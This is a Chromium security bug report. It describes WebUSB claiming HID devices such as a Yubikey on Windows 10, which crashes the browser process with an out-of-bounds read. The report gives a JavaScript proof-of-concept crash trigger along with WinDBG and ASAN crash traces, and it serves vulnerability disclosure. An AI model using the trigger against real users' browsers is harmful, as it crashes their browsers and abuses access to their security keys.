Issue metadata
Sign in to add a comment
|
Security: WebUSB HID Device Access + OOB Read / Crash Via WebUSB transferIn
Reported by
verv...@gmail.com,
Mar 3 2018
|
||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
On Windows 10, USB HID devices can be claimed via the WebUSB API.
When doing a transferIn call on the claimed USB devices, the main browser process will crash after a non-deterministic time has passed (between some seconds up to some minutes). The crash is sometimes
an OOB heap read, sometimes a read from an invalid pointer (see below).
ASAN will also report an overlapping memcpy call and also sometimes
an OOB heap read.
This seems to depend on the device (I tested the Feitian ePass and the Yubikey Neo). For crash analysis in WinDBG (64.0.3282.186 (Official Build) (64-bit)) and the ASAN crash report (asan-win32-release_x64-539034) see below. I suspect a race condition that leads to memory corruption.
Two security issues are relevant here:
1. HID devices should not be allowed to be claimed via WebUSB;
2. OOB memory access.
VERSION
Chrome Version: 64.0.3282.186 (Official Build) (64-bit) stable, asan-win32-release_x64-539034
Operating System: Windows 10 Enterprise Build 16299.rs3_release.170928-1534, running on VMWare Workstation 14
REPRODUCTION CASE
Connect a HID device (e.g. Yubikey NEO or Feitian ePass)
The following JavaScript should reproduce the issue:
~~~
async function crashWebUSB() {
// filters here: http://www.linux-usb.org/usb.ids
try {
device = await navigator.usb.requestDevice({ filters: [ ] })
.then(selectedDevice => {
device = selectedDevice;
// registerDevice(device);
console.log(device.configuration.interfaces);
return device;
});
await device.open();
await device.selectConfiguration(1); // Select configuration #1 for the device.
await device.claimInterface(0); // Request exclusive control over interface #2.
await device.selectAlternateInterface(0, 0);
// ++ anti tests
// await device.open()
// return device.open()
// .then(() => {
// if (device.configuration === null){
// return device.selectConfiguration(1)
// }
// })
// .then(() => device.claimInterface(2))
console.log("Claimed USB Device")
console.log("Trying to receive some data");
// nondeterministic time until crash here, firing up multiple transfers seems make it faster
tr = device.transferIn(4, 4096).then(result => {
console.log('<', (result.data.buffer)); })
} catch (e) {
console.log(e);
}
}
crashWebUSB();
~~~
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State:
## Crash Chrome Version 64.0.3282.186 (Official Build) (64-bit), Yubikey NEO - U2F HID
WinDBG crash analysis:
0:042> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\chrome.exe -
GetUrlPageData2 (WinHttp) failed: 12007.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
chrome!IsSandboxedProcess+ed77a7
00007ffa`2fd7acf3 0f10440af0 movups xmm0,xmmword ptr [rdx+rcx-10h]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffa2fd7acf3 (chrome!IsSandboxedProcess+0x0000000000ed77a7)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000020cc862c110
Attempt to read from address 0000020cc862c110
FAULTING_THREAD: 00000b30
DEFAULT_BUCKET_ID: INVALID_POINTER_READ
PROCESS_NAME: chrome.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 0000020cc862c110
FOLLOWUP_IP:
chrome!IsSandboxedProcess+ed77a7
00007ffa`2fd7acf3 0f10440af0 movups xmm0,xmmword ptr [rdx+rcx-10h]
READ_ADDRESS: 0000020cc862c110
WATSON_BKT_PROCSTAMP: 5a8e38d5
WATSON_BKT_PROCVER: 64.0.3282.186
PROCESS_VER_PRODUCT: Google Chrome
WATSON_BKT_MODULE: chrome.dll
WATSON_BKT_MODSTAMP: 5a8e35df
WATSON_BKT_MODOFFSET: 263acf3
WATSON_BKT_MODVER: 64.0.3282.186
MODULE_VER_PRODUCT: Google Chrome
BUILD_VERSION_STRING: 10.0.16299.15 (WinBuild.160101.0800)
MODLIST_WITH_TSCHKSUM_HASH: f71a334cb4fbebc2e1831de551a3037a2838107f
MODLIST_SHA1_HASH: a7c491ae9c70655f707556b5efeb07e54f6a7368
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: MSEDGEWIN10
ANALYSIS_SESSION_TIME: 03-04-2018 00:07:55.0702
ANALYSIS_VERSION: 10.0.16299.91 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n301]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0xb30]
Frame: [0] : chrome!IsSandboxedProcess
ID: [0n273]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0xb30]
Frame: [0] : chrome!IsSandboxedProcess
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 00007ffa2eece0ed to 00007ffa2fd7acf3
STACK_TEXT:
000000ab`bffff2d8 00007ffa`2eece0ed : 00000000`00000002 00007ffa`2eecf032 0000020b`cde36990 00007ffa`2eed2c29 : chrome!IsSandboxedProcess+0xed77a7
000000ab`bffff2e0 00007ffa`2eec9a9a : 00000000`00000001 00000000`00000000 00000000`00000002 0000020b`cac1a6e0 : chrome!IsSandboxedProcess+0x2aba1
000000ab`bffff330 00007ffa`2eed27d2 : 00008885`ff6b1e9f 0000020b`cd92b8e0 00000000`00000000 00000000`00000000 : chrome!IsSandboxedProcess+0x2654e
000000ab`bffff3f0 00007ffa`2eed2319 : 00007ffa`2ff36d58 00007ffa`2d7412cb 00000000`00000030 00000000`00000030 : chrome!IsSandboxedProcess+0x2f286
000000ab`bffff480 00007ffa`2eed289a : 00000009`00000009 000000ab`00000000 00000000`00000017 00007ffa`2d744455 : chrome!IsSandboxedProcess+0x2edcd
000000ab`bffff4e0 00007ffa`2eebaf77 : 00007d51`bb2c1ba4 000000ab`bffff678 0000020b`cda9ab50 00000000`00000014 : chrome!IsSandboxedProcess+0x2f34e
000000ab`bffff520 00007ffa`2d858e4f : 0000020b`c591aae0 00007ffa`2d75ed62 00000000`00000000 00000000`00000000 : chrome!IsSandboxedProcess+0x17a2b
000000ab`bffff6c0 00007ffa`2e62eb72 : ffffffff`ffffffff 00000000`00000000 00000000`00000000 00000000`00000000 : chrome!ovly_debug_event+0x11318f
000000ab`bffff760 00007ffa`5de41fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : chrome!GetHandleVerifier+0xef72
000000ab`bffff7e0 00007ffa`5dfdefc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000ab`bffff810 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
THREAD_SHA1_HASH_MOD_FUNC: ac17f1c3a51bcb6e69517176fe5eab5afb02b499
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: bf5d793aea34814ebda2cf224ecf228aecb092f1
THREAD_SHA1_HASH_MOD: 6e67fa0694e34f8e0536d9de2f93a743a0d71588
FAULT_INSTR_CODE: a44100f
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: chrome!IsSandboxedProcess+ed77a7
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: chrome
IMAGE_NAME: chrome.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5a8e35df
STACK_COMMAND: ~42s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_chrome.dll!IsSandboxedProcess
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_chrome!IsSandboxedProcess+ed77a7
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: chrome.dll
BUCKET_ID_IMAGE_STR: chrome.dll
FAILURE_MODULE_NAME: chrome
BUCKET_ID_MODULE_STR: chrome
FAILURE_FUNCTION_NAME: IsSandboxedProcess
BUCKET_ID_FUNCTION_STR: IsSandboxedProcess
BUCKET_ID_OFFSET: ed77a7
BUCKET_ID_MODTIMEDATESTAMP: 5a8e35df
BUCKET_ID_MODCHECKSUM: 306b120
BUCKET_ID_MODVER_STR: 64.0.3282.186
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: chrome.dll!IsSandboxedProcess
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/chrome.exe/64.0.3282.186/5a8e38d5/chrome.dll/64.0.3282.186/5a8e35df/c0000005/0263acf3.htm?Retriage=1
TARGET_TIME: 2018-03-03T23:08:07.000Z
OSBUILD: 16299
OSSERVICEPACK: 15
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: 1976-06-22 08:45:20
BUILDDATESTAMP_STR: 160101.0800
BUILDLAB_STR: WinBuild
BUILDOSVER_STR: 10.0.16299.15
ANALYSIS_SESSION_ELAPSED_TIME: 2cd4
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_read_c0000005_chrome.dll!issandboxedprocess
FAILURE_ID_HASH: {1873033c-ed88-222a-75c6-a5c73a64a892}
Followup: MachineOwner
---------
## Chrome asan-win32-release_x64-539034 - Crash-Yubikey-U2F:
Running the test in ASAN gives a "memcpy-param-overlap" error when
run with the YubiKey U2F or YubiKey NEO. For Feitian devices
it will give a heap OOB read. Here is the crash information
for the YubiKey NEO:
Unable to read VR Path Registry from C:\Users\IEUser\AppData\Local\openvr\openvrpaths.vrpath
=================================================================
==4836==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x120baea5d120,0x120caea5d11f) and [0x120badf89d01, 0x120cadf89d00) overlap
#0 0x7ff7f835afd8 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x14003afd8)
#1 0x7ffdde925fcb (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1861c5fcb)
#2 0x7ffdde91998d (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1861b998d)
#3 0x7ffdde934531 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1861d4531)
#4 0x7ffdde9332c0 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1861d32c0)
#5 0x7ffdde934967 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1861d4967)
#6 0x7ffdde8cb20a (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18616b20a)
#7 0x7ffddc043798 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1838e3798)
#8 0x7ffddbf61f3f (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183801f3f)
#9 0x7ff7f8351d78 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140031d78)
#10 0x7ffe1b5b1fe3 (C:\Windows\System32\KERNEL32.DLL+0x180011fe3)
#11 0x7ffe1d9befc0 (C:\Windows\SYSTEM32\ntdll.dll+0x18006efc0)
0x120baea5e127 is located 0 bytes to the right of 4135-byte region [0x120baea5d100,0x120baea5e127)
allocated by thread T0 here:
#0 0x7ff7f835a3a1 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x14003a3a1)
#1 0x7ffde3039462 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18a8d9462)
#2 0x7ffddc0801ef (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1839201ef)
#3 0x7ffddba7e83e (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18331e83e)
#4 0x7ffdd9782b9e (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x181022b9e)
#5 0x7ffddba82222 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183322222)
#6 0x7ffddd0577aa (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1848f77aa)
#7 0x7ffddd042c2a (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1848e2c2a)
#8 0x7ffddd041ba0 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1848e1ba0)
#9 0x7ffddd0533b0 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1848f33b0)
#10 0x7ffddd054738 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1848f4738)
#11 0x7ffddcf95e05 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x184835e05)
#12 0x7ffddc1bf851 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a5f851)
#13 0x7ffddc00255d (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1838a255d)
#14 0x7ffddc003967 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1838a3967)
#15 0x7ffddc171620 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a11620)
#16 0x7ffddc1702f0 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a102f0)
#17 0x7ffddbfa6cd7 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183846cd7)
#18 0x7ffddbd8f4e3 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18362f4e3)
#19 0x7ffdd9e9b7a8 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18173b7a8)
#20 0x7ffdd9ea53ab (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1817453ab)
#21 0x7ffdd9e8fbc9 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18172fbc9)
#22 0x7ffddbac48b1 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1833648b1)
#23 0x7ffddbac5a62 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183365a62)
#24 0x7ffddbb3338b (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1833d338b)
#25 0x7ffddbac4506 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183364506)
#26 0x7ffdd87613ea (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1800013ea)
#27 0x7ff7f8327e5c (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140007e5c)
#28 0x7ff7f832234c (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x14000234c)
#29 0x7ff7f8660c18 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140340c18)
Thread T56 created by T46 here:
#0 0x7ff7f8350cb3 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140030cb3)
#1 0x7ffddbf6149b (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18380149b)
#2 0x7ffddc043112 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1838e3112)
#3 0x7ffdde8cb5fa (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18616b5fa)
#4 0x7ffdde89ebc6 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18613ebc6)
#5 0x7ffdde8afe5c (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18614fe5c)
#6 0x7ffddc1bf851 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a5f851)
#7 0x7ffddc1c51ff (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a651ff)
#8 0x7ffddc1c3acc (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a63acc)
#9 0x7ffddc1df440 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7f440)
#10 0x7ffddbf61f3f (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183801f3f)
#11 0x7ff7f8351d78 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140031d78)
#12 0x7ffe1b5b1fe3 (C:\Windows\System32\KERNEL32.DLL+0x180011fe3)
#13 0x7ffe1d9befc0 (C:\Windows\SYSTEM32\ntdll.dll+0x18006efc0)
Thread T46 created by T0 here:
#0 0x7ff7f8350cb3 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140030cb3)
#1 0x7ffddbf6149b (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18380149b)
#2 0x7ffddc1de320 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7e320)
#3 0x7ffddc1ddf64 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7df64)
#4 0x7ffddc1d355d (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7355d)
#5 0x7ffddc1d6eff (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a76eff)
#6 0x7ffddc1d3b76 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a73b76)
#7 0x7ffddc1dadf4 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7adf4)
#8 0x7ffddc1da976 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7a976)
#9 0x7ffddc1db79a (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7b79a)
#10 0x7ffddc1dbc8d (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a7bc8d)
#11 0x7ffddc00765c (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1838a765c)
#12 0x7ffddb465f2e (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x182d05f2e)
#13 0x7ffddb4672ce (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x182d072ce)
#14 0x7ffde10cc61e (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18896c61e)
#15 0x7ffddb495ea0 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x182d35ea0)
#16 0x7ffde289a102 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18a13a102)
#17 0x7ffde2884826 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18a124826)
#18 0x7ffde287f3de (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18a11f3de)
#19 0x7ffde07463fa (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x187fe63fa)
#20 0x7ffde074d72c (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x187fed72c)
#21 0x7ffddbcb26c7 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1835526c7)
#22 0x7ffddbcb32fd (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1835532fd)
#23 0x7ffddbb5ef6b (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1833fef6b)
#24 0x7ffddbb5eabf (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1833feabf)
#25 0x7ffddbb9c4d5 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18343c4d5)
#26 0x7ffddd990a56 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x185230a56)
#27 0x7ffddd97db0f (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18521db0f)
#28 0x7ffddd97d0aa (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18521d0aa)
#29 0x7ffddd97cbcb (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18521cbcb)
#30 0x7ffddd97c7d0 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18521c7d0)
#31 0x7ffddbb87685 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183427685)
#32 0x7ffddbb4a217 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1833ea217)
#33 0x7ffddd97db0f (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18521db0f)
#34 0x7ffddd97d0aa (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18521d0aa)
#35 0x7ffddd97cbcb (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18521cbcb)
#36 0x7ffddd97c7d0 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18521c7d0)
#37 0x7ffddd990173 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x185230173)
#38 0x7ffddd98f7a1 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18522f7a1)
#39 0x7ffddd98ea3a (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18522ea3a)
#40 0x7ffddbbae46a (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18344e46a)
#41 0x7ffddbbff102 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18349f102)
#42 0x7ffddbbf8090 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183498090)
#43 0x7ffddbbf7a5f (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183497a5f)
#44 0x7ffddcc06b9a (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1844a6b9a)
#45 0x7ffe1bc8b85c (C:\Windows\System32\USER32.dll+0x18000b85c)
#46 0x7ffe1bc8b1ee (C:\Windows\System32\USER32.dll+0x18000b1ee)
#47 0x7ffddc171fdf (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a11fdf)
#48 0x7ffddc17157c (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a1157c)
#49 0x7ffddc1702f0 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183a102f0)
#50 0x7ffddbfa6cd7 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183846cd7)
#51 0x7ffddbd8f4e3 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18362f4e3)
#52 0x7ffdd9e9b7a8 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18173b7a8)
#53 0x7ffdd9ea53ab (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1817453ab)
#54 0x7ffdd9e8fbc9 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x18172fbc9)
#55 0x7ffddbac48b1 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1833648b1)
#56 0x7ffddbac5a62 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183365a62)
#57 0x7ffddbb3338b (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1833d338b)
#58 0x7ffddbac4506 (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x183364506)
#59 0x7ffdd87613ea (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.dll+0x1800013ea)
#60 0x7ff7f8327e5c (C:\Users\IEUser\Downloads\win32-release_x64_asan-win32-release_x64-539034\asan-win32-release_x64-539034\chrome.exe+0x140007e5c)
